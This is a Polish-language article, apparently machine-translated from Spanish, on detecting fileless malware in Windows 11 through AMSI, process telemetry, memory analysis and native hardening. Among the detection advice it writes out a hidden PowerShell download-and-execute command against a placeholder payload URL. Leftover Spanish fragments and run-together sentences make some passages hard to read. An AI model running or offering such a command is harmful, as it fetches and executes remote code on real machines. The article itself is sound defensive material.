Jak wykryć niebezpieczne złośliwe oprogramowanie bez plików w systemie Windows 11

¿Jak wykryć niebezpieczne złośliwe oprogramowanie bez plików? Aktywność ataków bezplikowych znacznie wzrosła, a co gorsza, Windows 11 nie jest odpornyTo podejście omija dysk i opiera się na pamięci oraz legalnych narzędziach systemowych; dlatego programy antywirusowe oparte na sygnaturach mają problemy. Jeśli szukasz niezawodnego sposobu na wykrycie wirusa, rozwiązaniem jest połączenie telemetria, analiza zachowań i sterowanie systemem Windows.

W obecnym ekosystemie kampanie wykorzystujące PowerShell, WMI lub Mshta współistnieją z bardziej zaawansowanymi technikami, takimi jak wstrzykiwanie pamięci, trwałość „bez dotykania” dysku, a nawet nadużycia oprogramowania sprzętowegoKluczem jest zrozumienie mapy zagrożeń, faz ataku i sygnałów, jakie one pozostawiają, nawet gdy wszystko dzieje się w pamięci RAM.

Czym jest złośliwe oprogramowanie bezplikowe i dlaczego stanowi problem w systemie Windows 11?

Kiedy mówimy o zagrożeniach „bezplikowych”, mamy na myśli złośliwy kod, który Nie musisz deponować nowych plików wykonywalnych w systemie plików, aby działać. Zwykle jest wstrzykiwany do działających procesów i wykonywany w pamięci RAM, w oparciu o interpretery i pliki binarne podpisane przez firmę Microsoft (np. PowerShell, WMI, rundll32, mshtaDzięki temu zmniejszysz swój wpływ na środowisko i ominiesz wyszukiwarki, które wyszukują tylko podejrzane pliki.

Nawet dokumenty biurowe lub pliki PDF wykorzystujące luki w zabezpieczeniach do uruchamiania poleceń są uważane za część tego zjawiska, ponieważ aktywuj wykonywanie w pamięci bez pozostawiania użytecznych plików binarnych do analizy. Nadużycie makra i DDE W pakiecie Office, ponieważ kod jest uruchamiany w legalnych procesach, takich jak WinWord.

Atakujący łączą socjotechnikę (phishing, linki spamowe) z pułapkami technicznymi: kliknięcie użytkownika inicjuje łańcuch, w którym skrypt pobiera i wykonuje ostateczny ładunek w pamięci, unikanie pozostawiania śladu na dysku. Cele obejmują kradzież danych, wykonanie ransomware i ciche przemieszczanie się.

Typologie według śladu w systemie: od „czystych” do hybrydowych

Aby uniknąć mylących pojęć, pomocne jest rozdzielenie zagrożeń według stopnia ich interakcji z systemem plików. Taka kategoryzacja wyjaśnia co pozostaje, gdzie kod się znajduje i jakie znaki pozostawia?.

Typ I: brak aktywności pliku

Całkowicie bezplikowe złośliwe oprogramowanie nie zapisuje niczego na dysku. Klasycznym przykładem jest wykorzystanie podatność sieci (jak wektor EternalBlue w przeszłości), aby zaimplementować furtkę rezydującą w pamięci jądra (przypadki takie jak DoublePulsar). W tym przypadku wszystko dzieje się w pamięci RAM i nie ma żadnych artefaktów w systemie plików.

Inną opcją jest zanieczyszczenie oprogramowanie układowe komponentów: BIOS/UEFI, kart sieciowych, urządzeń peryferyjnych USB (techniki typu BadUSB), a nawet podsystemów procesora. Utrzymują się one po ponownym uruchomieniu i instalacji, z dodatkowym utrudnieniem, Niewiele produktów sprawdza oprogramowanie sprzętoweSą to ataki złożone, przeprowadzane rzadziej, ale niebezpieczne ze względu na swoją niewidzialność i trwałość.

Typ II: Pośrednia działalność archiwizacyjna

W tym przypadku złośliwe oprogramowanie nie „pozostawia” własnego pliku wykonywalnego, lecz korzysta z zarządzanych przez system kontenerów, które są zasadniczo przechowywane jako pliki. Na przykład, tylne furtki, które umieszczają Polecenia programu PowerShell w repozytorium WMI i wyzwalać jego uruchomienie za pomocą filtrów zdarzeń. Można go zainstalować z wiersza poleceń bez usuwania plików binarnych, ale repozytorium WMI znajduje się na dysku jako legalna baza danych, co utrudnia jego czyszczenie bez wpływu na system.

Z praktycznego punktu widzenia uważa się je za bezplikowe, ponieważ kontener (WMI, rejestr itp.) Nie jest to klasyczny, wykrywalny plik wykonywalny A jego oczyszczenie nie jest trywialne. Rezultat: dyskretna trwałość z niewielkimi „tradycyjnymi” śladami.

Typ III: Wymaga plików do działania

W niektórych przypadkach utrzymuje się trwałość „bezplikowa” Logicznie rzecz biorąc, potrzebują wyzwalacza opartego na pliku. Typowym przykładem jest Kovter: rejestruje on polecenie powłoki dla losowego rozszerzenia; po otwarciu pliku z tym rozszerzeniem uruchamiany jest mały skrypt wykorzystujący mshta.exe, który rekonstruuje złośliwy ciąg znaków z rejestru.

Sztuczka polega na tym, że te „przynętowe” pliki z losowymi rozszerzeniami nie zawierają analizowalnego ładunku, a większość kodu znajduje się w Nagrywać (kolejny kontener). Dlatego są one klasyfikowane jako bezplikowe pod względem wpływu, mimo że ściśle rzecz biorąc, zależą od jednego lub więcej artefaktów dyskowych jako wyzwalacza.

Wektory i „żywiciele” infekcji: gdzie wnikają i gdzie się ukrywają

Aby poprawić wykrywalność, kluczowe jest zmapowanie punktu wejścia i nosiciela infekcji. Ta perspektywa pomaga w projektowaniu określone kontrole Nadaj priorytet odpowiednim danym telemetrycznym.

Exploits

• Oparte na plikach (Typ III): Dokumenty, pliki wykonywalne, starsze pliki Flash/Java lub pliki LNK mogą wykorzystywać przeglądarkę lub silnik, który je przetwarza, do ładowania kodu powłoki do pamięci. Pierwszy wektor to plik, ale ładunek trafia do pamięci RAM.
• Oparte na sieci (Typ I): Pakiet wykorzystujący lukę w zabezpieczeniach (np. w protokole SMB) zostaje uruchomiony w przestrzeni użytkownika lub jądrze. To podejście spopularyzował WannaCry. Bezpośrednie ładowanie pamięci bez nowego pliku.

Sprzęt komputerowy

• Urządzenia (Typ I): Oprogramowanie sprzętowe dysku lub karty sieciowej może zostać zmienione, a kod wprowadzony. Trudne do sprawdzenia i pozostające poza systemem operacyjnym.
• Podsystemy procesora i zarządzania (Typ I): Technologie takie jak ME/AMT firmy Intel wykazały, że prowadzą do Sieć i wykonywanie poza systemem operacyjnymAtakuje na bardzo niskim poziomie, z dużym potencjałem ukrycia.
• USB (Typ I): BadUSB umożliwia przeprogramowanie dysku USB w celu udawania klawiatury lub karty sieciowej i uruchamiania poleceń lub przekierowywania ruchu.
• BIOS/UEFI (Typ I): złośliwe przeprogramowanie oprogramowania sprzętowego (przypadki takie jak Mebromi), które uruchamia się przed uruchomieniem systemu Windows.
• Hypervisor (Typ I): Implementacja mini-hiperwizora pod systemem operacyjnym w celu ukrycia jego obecności. Rzadkie, ale już obserwowane w postaci rootkitów hiperwizora.

Wykonanie i wstrzyknięcie

• Oparte na plikach (Typ III): EXE/DLL/LNK lub zadania zaplanowane, które uruchamiają ataki na legalne procesy.
• Macros (Typ III): VBA w pakiecie Office potrafi dekodować i uruchamiać ładunki, w tym pełne oprogramowanie ransomware, za zgodą użytkownika poprzez oszustwo.
• Skrypty (Typ II): PowerShell, VBScript lub JScript z pliku, wiersza poleceń, usługi, rejestracja lub WMIAtakujący może wpisać skrypt w sesji zdalnej, nie dotykając dysku.
• Rekord rozruchowy (MBR/Boot) (Typ II): Rodziny takie jak Petya nadpisują sektor rozruchowy, aby przejąć kontrolę podczas uruchamiania. Jest on poza systemem plików, ale dostępny dla systemu operacyjnego i nowoczesnych rozwiązań, które mogą go przywrócić.

Jak działają ataki bezplikowe: fazy i sygnały

Chociaż nie pozostawiają plików wykonywalnych, kampanie działają etapowo. Zrozumienie ich pozwala na monitorowanie. zdarzenia i relacje między procesami które pozostawiają ślad.

• Pierwszy dostępAtaki phishingowe z wykorzystaniem linków lub załączników, zainfekowanych stron internetowych lub skradzionych danych uwierzytelniających. Wiele łańcuchów rozpoczyna się od dokumentu pakietu Office, który uruchamia polecenie. PowerShell.
• Trwałość: tylne drzwi przez WMI (filtry i subskrypcje), Klucze wykonywania rejestru lub zaplanowane zadania, które ponownie uruchamiają skrypty bez nowego złośliwego pliku.
• EksfiltracjaPo zebraniu informacji są one wysyłane poza sieć za pomocą zaufanych procesów (przeglądarki, PowerShell, bitsadmin) w celu zmieszania ruchu.

Ten wzór jest szczególnie podstępny, ponieważ wskaźniki ataku Ukrywają się w normalności: argumentach wiersza poleceń, łańcuchach procesów, nietypowych połączeniach wychodzących lub dostępie do interfejsów API służących do wstrzykiwania.

Typowe techniki: od pamięci do nagrywania

Aktorzy polegają na szeregu metody które optymalizują ukrycie. Znajomość najczęstszych z nich jest pomocna, aby aktywować skuteczne wykrywanie.

• Mieszkaniec pamięci:Ładowanie ładunków do przestrzeni zaufanego procesu, który oczekuje na aktywację. rootkity i haki W jądrze podnoszą poziom ukrycia.
• Trwałość w rejestrzeZapisz zaszyfrowane bloby w kluczach i zrestartuj je z legalnego programu uruchamiającego (mshta, rundll32, wscript). Tymczasowy instalator może się samozniszczyć, aby zminimalizować swój rozmiar.
• Phishing poświadczeńKorzystając ze skradzionych nazw użytkowników i haseł, atakujący wykonuje zdalne powłoki i instaluje cichy dostęp w Rejestrze lub WMI.
• Oprogramowanie ransomware „bez plików”Szyfrowanie i komunikacja C2 są realizowane z pamięci RAM, co ogranicza możliwość wykrycia do momentu, gdy uszkodzenie stanie się widoczne.
• Zestawy operacyjne:zautomatyzowane łańcuchy wykrywające luki w zabezpieczeniach i wdrażające ładunki działające wyłącznie w pamięci po kliknięciu przez użytkownika.
• Dokumenty z kodem:makra i mechanizmy takie jak DDE, które uruchamiają polecenia bez zapisywania plików wykonywalnych na dysku.

Badania branżowe wykazały już znaczące wzrosty: w jednym okresie 2018 r. wzrost o ponad 90% w atakach opartych na skryptach i łańcuchach PowerShell, znak, że wektor ten jest preferowany ze względu na swoją skuteczność.

Wyzwanie dla firm i dostawców: dlaczego blokowanie nie wystarczy

Kuszące byłoby wyłączenie programu PowerShell lub zakazanie makr na zawsze, ale Zniszczysz operacjęPowerShell jest filarem nowoczesnej administracji, a pakiet Office jest niezbędny w biznesie; bezmyślne blokowanie często nie jest wykonalne.

Co więcej, istnieją sposoby na ominięcie podstawowych kontroli: uruchamianie programu PowerShell za pomocą bibliotek DLL i rundll32, pakowanie skryptów do plików EXE, Przynieś własną kopię programu PowerShell lub nawet ukrywać skrypty w obrazach i wyodrębniać je do pamięci. Dlatego obrona nie może opierać się wyłącznie na zaprzeczeniu istnienia narzędzi.

Innym częstym błędem jest delegowanie całej decyzji do chmury: jeśli agent musi czekać na odpowiedź z serwera, Tracisz zapobieganie w czasie rzeczywistymDane telemetryczne można przesyłać w celu wzbogacenia informacji, ale Łagodzenie musi nastąpić w punkcie końcowym.

Jak wykryć złośliwe oprogramowanie bezplikowe w systemie Windows 11: dane telemetryczne i zachowanie

Zwycięska strategia to monitoruj procesy i pamięćNie pliki. Złośliwe zachowania są bardziej stabilne niż formy, jakie przybierają pliki, co czyni je idealnymi dla mechanizmów prewencyjnych.

• AMSI (interfejs skanowania antymalware)Przechwytuje skrypty PowerShell, VBScript i JScript, nawet gdy są dynamicznie konstruowane w pamięci. Doskonale nadaje się do przechwytywania zaciemnionych ciągów znaków przed ich wykonaniem.
• Monitorowanie procesów: start/meta, PID, rodzice i dzieci, trasy, wiersze poleceń i skróty, a także drzewa wykonawcze, które pozwalają zrozumieć całą historię.
• Analiza pamięci: wykrywanie wtrysków, obciążeń odblaskowych lub PE bez dotykania dysku oraz przeglądanie nietypowych obszarów wykonywalnych.
• Ochrona sektora startowego: kontrola i przywracanie MBR/EFI w przypadku manipulacji.

W ekosystemie Microsoft Defender for Endpoint łączy w sobie AMSI, monitorowanie zachowańSkanowanie pamięci i uczenie maszynowe w chmurze służą do skalowania detekcji w oparciu o nowe lub zamaskowane warianty. Inni dostawcy stosują podobne podejście w silnikach rezydujących w jądrze.

Realistyczny przykład korelacji: od dokumentu do programu PowerShell

Wyobraź sobie łańcuch, w którym Outlook pobiera załącznik, Word otwiera dokument, aktywna zawartość jest włączona, a PowerShell uruchamia się z podejrzanymi parametrami. Prawidłowa telemetria pokazałaby wiersz poleceń (np. ominięcie ExecutionPolicy Bypass, ukryte okno), łączenie się z niezaufaną domeną i tworzenie procesu potomnego, który instaluje się w AppData.

Agent posiadający kontekst lokalny jest w stanie: zatrzymaj się i cofnij szkodliwą aktywność bez ręcznej interwencji, oprócz powiadomienia SIEM lub za pośrednictwem poczty e-mail/SMS. Niektóre produkty dodają warstwę atrybucji przyczyny źródłowej (modele typu StoryLine), która wskazuje nie na widoczny proces (Outlook/Word), ale na pełny wątek złośliwy i jego pochodzenia, aby kompleksowo oczyścić system.

Typowy wzorzec poleceń, na który warto zwrócić uwagę, wygląda następująco: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden (New-Object Net.WebClient).DownloadString('http//dominiotld/payload');Logika nie jest dokładnym ciągiem znaków, ale zestaw sygnałów: obejście zasad, ukryte okno, wyczyszczenie pobierania i wykonywanie w pamięci.

AMSI, rurociąg i rola każdego aktora: od punktu końcowego do SOC

Oprócz przechwytywania skryptów, solidna architektura organizuje kroki ułatwiające dochodzenie i reagowanie. Im więcej dowodów zgromadzisz przed wykonaniem zadania, tym lepiej., mejor.

• Przechwytywanie skryptuAMSI dostarcza zawartość (nawet jeśli jest generowana na bieżąco) do analizy statycznej i dynamicznej w ramach procesu wykrywania złośliwego oprogramowania.
• Wydarzenia procesoweGromadzone są identyfikatory PID, pliki binarne, skróty, trasy i inne dane. argumenty, ustanawiając drzewa procesów, które doprowadziły do ​​końcowego załadowania.
• Wykrywanie i raportowanieWykrycia są wyświetlane na konsoli produktu i przekazywane do platform sieciowych (NDR) w celu wizualizacji kampanii.
• Gwarancje użytkownikaNawet jeśli skrypt zostanie wstrzyknięty do pamięci, struktura AMSI to przechwytuje w zgodnych wersjach systemu Windows.
• Możliwości administratora: konfiguracja zasad umożliwiająca inspekcję skryptów, blokowanie oparte na zachowaniu i tworzenie raportów z poziomu konsoli.
• Praca SOC: ekstrakcja artefaktów (identyfikator UUID maszyny wirtualnej, wersja systemu operacyjnego, typ skryptu, proces inicjujący i jego proces nadrzędny, skróty i wiersze poleceń) w celu odtworzenia historii i zasady korzystania z wyciągu futuras.

Gdy platforma umożliwia eksportowanie bufor pamięci W związku z tym badacze mogą dokonywać nowych wykryć i udoskonalać obronę przed podobnymi wariantami.

Praktyczne środki w systemie Windows 11: zapobieganie i śledzenie

Oprócz funkcji EDR z inspekcją pamięci i AMSI system Windows 11 umożliwia zamykanie obszarów ataków i poprawę widoczności dzięki sterowanie natywne.

• Rejestracja i ograniczenia w programie PowerShellWłącza rejestrowanie bloków skryptów i modułów, stosuje tryby ograniczone, gdy jest to możliwe, i kontroluje użycie Obejście/Ukryte.
• Reguły redukcji powierzchni ataku (ASR):blokuje uruchamianie skryptów przez procesy pakietu Office i Nadużycie WMI/PSExec, gdy nie jest potrzebne.
• Zasady makr pakietu Office: domyślnie wyłącza wewnętrzne podpisywanie makr i ścisłe listy zaufania; monitoruje starsze przepływy DDE.
• Audyt i rejestr WMI:monitoruje subskrypcje zdarzeń i klucze automatycznego wykonywania (Run, RunOnce, Winlogon), a także tworzenie zadań planowy.
• Ochrona uruchamiania: aktywuje Bezpieczny rozruch, sprawdza integralność MBR/EFI i weryfikuje, czy podczas uruchamiania nie wprowadzono żadnych modyfikacji.
• Łatanie i utwardzanie: zamyka podatne na wykorzystanie luki w zabezpieczeniach przeglądarek, komponentów pakietu Office i usług sieciowych.
• Concienciación:szkoli użytkowników i zespoły techniczne w zakresie phishingu i sygnałów tajne egzekucje.

W przypadku polowania skup się na zapytaniach dotyczących: tworzenia procesów przez Office w kierunku PowerShell/MSHTA, argumentów z pobierzciąg/pobierzplikSkrypty z wyraźnym zaciemnieniem, wstrzykiwaniem refleksyjnym i sieciami wychodzącymi do podejrzanych domen najwyższego poziomu (TLD). Porównaj te sygnały z reputacją i częstotliwością, aby zredukować szum.

Co może wykryć każdy silnik dzisiaj?

Rozwiązania korporacyjne firmy Microsoft łączą w sobie AMSI, analizę behawioralną, zbadać pamięć i ochronę sektora rozruchowego, a także oparte na chmurze modele uczenia maszynowego (ML) umożliwiające skalowanie w odpowiedzi na pojawiające się zagrożenia. Inni dostawcy wdrażają monitorowanie na poziomie jądra, aby odróżniać złośliwe oprogramowanie od nieszkodliwego, z automatycznym wycofywaniem zmian.

Podejście oparte na historie egzekucji Umożliwia zidentyfikowanie przyczyny źródłowej (na przykład załącznika programu Outlook, który uruchamia łańcuch) i złagodzenie całego drzewa: skryptów, kluczy, zadań i pośrednich plików binarnych, dzięki czemu nie trzeba skupiać się na widocznym objawie.

Najczęstsze błędy i sposoby ich unikania

Blokowanie programu PowerShell bez alternatywnego planu zarządzania jest nie tylko niepraktyczne, ale także stwarza ryzyko sposoby pośredniego wywołaniaTo samo dotyczy makr: albo zarządzasz nimi za pomocą zasad i sygnatur, albo firma ucierpi. Lepiej skupić się na telemetrii i regułach behawioralnych.

Innym powszechnym błędem jest przekonanie, że umieszczenie aplikacji na białej liście rozwiąże wszystkie problemy: technologia bezplikowa opiera się właśnie na tym założeniu. zaufane aplikacjeKontrola powinna obserwować, co robią i jak są ze sobą powiązane, a nie tylko czy są dozwolone.

Biorąc pod uwagę powyższe, złośliwe oprogramowanie bezplikowe przestaje być „duchem”, gdy monitorujesz to, co naprawdę ważne: zachowanie, pamięć i pochodzenie każdego wykonania. Połączenie AMSI, bogatej telemetrii procesów, natywnych kontrolek systemu Windows 11 oraz warstwy EDR z analizą behawioralną daje przewagę. Dodaj do tego realistyczne zasady dotyczące makr i programu PowerShell, audyt WMI/rejestru oraz wyszukiwanie priorytetowe dla wierszy poleceń i drzew procesów, a otrzymasz obronę, która przecina te łańcuchy, zanim cokolwiek zaczną szwankować.